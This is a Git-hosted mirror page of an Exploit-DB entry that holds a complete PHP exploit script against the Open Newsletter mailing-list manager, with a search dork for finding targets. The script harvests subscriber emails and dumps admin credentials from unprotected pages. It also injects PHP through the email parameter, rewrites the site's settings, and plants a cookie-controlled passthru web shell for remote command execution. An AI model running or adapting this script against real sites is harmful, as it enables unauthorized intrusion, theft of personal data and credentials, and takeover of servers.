bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/2981.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

288 lines
10 KiB
PHP
Executable file
Raw Blame History

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "\r\n";
echo "Open Newsletter <= 2.* Muliple Vulnerabilities\r\n";
echo "Site: http://www.selfexile.com/projects/opennewsletter/\r\n";
echo "Dork: \"This is a Free & Open Source mailing list manager\"\r\n";
echo "by BlackHawk <hawkgotyou@gmail.com> <http://itablackhawk.altervista.org>\r\n";
echo "Thanks to rgod for the php code and Marty for the Love\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." Site Path AttackType Related\r\n";
echo "Host: target server (ip/hostname)\r\n";
echo "Path: path to Open Newsletter\r\n";
echo "AttackType: 1 - Subscribers Email retrieve\r\n";
echo " |-> Related: None\r\n";
echo " |-> Es: php ".$argv[0]." localhost /opnletter/ 1\r\n\r\n";
echo " 2 - Credential Retrieve\r\n";
echo " |-> Related: None\r\n";
echo " |-> Es: php ".$argv[0]." localhost /opnletter/ 2\r\n\r\n";
echo " 3 - Remote Command Execution\r\n";
echo " |-> Related: None\r\n";
echo " |-> Es: php ".$argv[0]." localhost /opnletter/ 3 dir\r\n\r\n";
echo "\r\n";
echo "";
die;
}
/*
---
Ver 1.1 - fixed for mq=on
---
Some one told me that this was absolutely a very good scritp..
i think that the programmer nearly do not know PHP..
why? this is the only protection for admin files:
------------------------------------
session_start();
if($_SESSION["valid"] != true)
{
header("Location: index.php");
}
------------------------------------
do you remember that this one will only 'work' with normal browsers?
that the script will continue to be executed until the end?
this exploit only works with the conseguence of this..
Started programming: 18.31 22/12/2006
Ended: 19.39 22/12/2006
Merry Xmas and a happy new Hacking Year ^_^
BlackHawk <hawkgotyou@gmail.com>
PS: have some spear time? the 01/01 send me 'happy birthdate' emails ^_*
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$attack_type=$argv[3];
$port=80;
$proxy="";
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
switch($attack_type)
{
case 1: //Email Retrieve
echo "Attack No 1 - Subscribers Email Retrieve\r\n";
echo "-- Start of Result--\r\n";
$packet ="GET ".$p."subscribers.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$dopo_campo = explode("<select class=textField name=email><option>",$html);
$prima_fine = explode("</option></select>",$dopo_campo[1]);
$emails = str_replace("</option><option>", "\r\n", $prima_fine[0]);
echo $emails;
echo "\r\n-- End of Result--";
break;
case 2: // Credential Retrieve
$usr_id=$argv[4];
echo "Attack No 2 - Credential Retrieve\r\n";
$packet ="GET ".$p."settings.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp = explode("<input class=textField type=text name='admin_username' value='", $html);
$user_name = explode("' title='", $temp[1]);
$temp2 = explode("<input class=textField type=text name='admin_password' value='", $html);
$user_password = explode("' title='", $temp2[1]);
$temp3 = explode("<input type=hidden name=old_db_file value=", $html);
$database_name = explode(">", $temp3[1]);
echo "UserName: ".$user_name[0]."\r\n";
echo "Password: ".$user_password[0]."\r\n";
echo "Database Name: ".$database_name[0]."\r\n";
break;
break;
case 3: // Command Execution
$cmd="";
for ($i=4; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$packet ="GET ".$p."piggy_marty.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"69696"))
{
echo "Exploit succeeded...\r\n";
$temp69=explode("69696",$html);
die("\r\n".$temp69[1]."\r\n");
}
$packet ='GET '.$p.'subscribe.php?action=subscribe&email=<?php%20$fp=fopen($_GET[nomeshell],$_GET[w]);fputs($fp,$_GET[shell]);fclose($fp);chmod($_GET[nomeshell],777);?> HTTP/1.0\r\n';
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
echo "Attack No 3 - Remote Command Execution\r\n";
$packet ="GET ".$p."settings.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp = explode("<input class=textField type=text name='admin_username' value='", $html);
$user_name = explode("' title='", $temp[1]);
$temp2 = explode("<input class=textField type=text name='admin_password' value='", $html);
$user_password = explode("' title='", $temp2[1]);
$temp3 = explode("<input type=hidden name=old_db_file value=", $html);
$database_name = explode(">", $temp3[1]);
$temp4 = explode("<input class=textField type=text name='admin_name' value='", $html);
$admin_name = explode("' title='", $temp4[1]);
$temp5 = explode("<input class=textField type=text name='admin_email' value='", $html);
$admin_email = explode("' title='", $temp5[1]);
$temp6 = explode("<input class=textField type=text name='charset' value='", $html);
$chr = explode("' title='", $temp6[1]);
$temp7 = explode("<input class=textField type=text name='site_url' value='", $html);
$site_url = explode("' title='", $temp7[1]);
$temp8 = explode("<input class=textField type=text name='opennewsletter_dir' value='", $html);
$dir = explode("' title='", $temp8[1]);
$data="action=update";
$data.="&admin_username=".$user_name[0];
$data.="&admin_password=".$user_password[0];
$data.="&admin_name=".$admin_name[0];
$data.="&admin_email=".$admin_email[0];
$data.="&unsubscribe_link=on";
$data.="&charset=".$chr[0];
$data.="&site_url=".$site_url[0];
$data.="&opennewsletter_dir=".$dir[0];
$data.="&db_file=hello.php";
$data.="&old_db_file=".$database_name[0];
$packet="POST ".$p."settings.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
$shell = '<?php%20error_reporting(0);set_time_limit(0);if%20(get_magic_quotes_gpc())%20{$_COOKIE[cmd]=stripslashes($_COOKIE[cmd]);}echo%2069696;passthru($_COOKIE[cmd]);echo%2069696;?>';
$packet ="GET ".$p."hello.php?w=w&shell=$shell&nomeshell=piggy_marty.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
$packet ="GET ".$p."unsubscribe.php?email=<?php%20\$fp=fopen(\$_GET[nomeshell],\$_GET[w]);fputs(\$fp,\$_GET[shell]);fclose(\$fp);chmod(\$_GET[nomeshell],777);?> HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
sleep(1);
$data="action=update";
$data.="&admin_username=".$user_name[0];
$data.="&admin_password=".$user_password[0];
$data.="&admin_name=".$admin_name[0];
$data.="&admin_email=".$admin_email[0];
$data.="&unsubscribe_link=on";
$data.="&charset=".$chr[0];
$data.="&site_url=".$site_url[0];
$data.="&opennewsletter_dir=".$dir[0];
$data.="&db_file=".$database_name[0];
$data.="&old_db_file=".$database_name[0];
$packet="POST ".$p."settings.php HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
sleep(1);
echo "Shell Created and Files Restored.. Now Try to execute command..\r\n\r\n";
$packet ="GET ".$p."piggy_marty.php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd.";\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"69696"))
{
echo "Exploit succeeded...\r\n";
$temp69=explode("69696",$html);
die("\r\n".$temp69[1]."\r\n");
}
break;
}
?>
# milw0rm.com [2006-12-23]
Reference in a new issue View git blame Copy permalink